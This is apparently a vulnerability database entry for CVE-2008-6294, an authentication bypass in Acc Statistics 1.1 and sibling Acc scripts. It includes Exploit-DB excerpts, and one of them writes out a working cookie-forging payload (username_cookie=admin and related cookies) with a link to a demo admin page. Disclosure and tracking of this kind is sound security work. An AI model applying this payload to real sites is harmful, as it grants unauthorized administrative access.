CVE-2008-6294
Published: 2009-02-26
Priority: P353 | high | CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 2.74% (84.3th percentile)
admin/Index.php in Acc Statistics 1.1 allows remote attackers to bypass authentication and gain administrative access by setting the username_cookie cookie to "admin".
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| accscripts | acc_statistics | — | — |
No detection rules found.
Exploit-DB
Acc Autos 4.0 - Insecure Cookie Handling
exploitdb·2008-11-03
CVE-2008-6294 Acc Autos 4.0 - Insecure Cookie Handling
---
Author: x0r - Road Crew - Evolution Team
Cms: Acc Autos v4.0
Bug: Insecure Cookie Handling
Site: http://pro7.altervista.org/v2/
Exploit:
[+]javascript:document.cookie="username_cookie=admin";
[+]javascript:document.cookie="right_cookie=1";
[+]javascript:document.cookie="id_cookie=1";
Live Demo:
http://www.accscripts.com/autos/demo/admin/
Greetz: 8\10\2008..The Dream Becomes Reality ...Bimb4 I Love You.
# milw0rm.com [2008-11-03]
Exploit-DB
Acc Real Estate 4.0 - Insecure Cookie Handling
exploitdb·2008-11-03
CVE-2008-6294 Acc Real Estate 4.0 - Insecure Cookie Handling
---
###########################################################################
# [~] Discovered by : Hakxer
# [~] Type Gap : Acc Real Estate v4.0 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/realestate/admin-area-specifications.html
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################
Bug In : /admin/Ind
Exploit-DB
Acc Statistics 1.1 - Insecure Cookie Handling
exploitdb·2008-11-03
CVE-2008-6294 Acc Statistics 1.1 - Insecure Cookie Handling
---
###########################################################################
# [~] Discovered by : Hakxer
# [~] Type Gap : AccStatistics v1.1 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/accstatistics.html
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################
Bug In : /admin/Index.php
PoC : javascript:d
No writeups or analysis indexed.
http://secunia.com/advisories/32517
http://www.securityfocus.com/bid/32078
https://exchange.xforce.ibmcloud.com/vulnerabilities/46292
https://www.exploit-db.com/exploits/6965
Published: 2009-02-26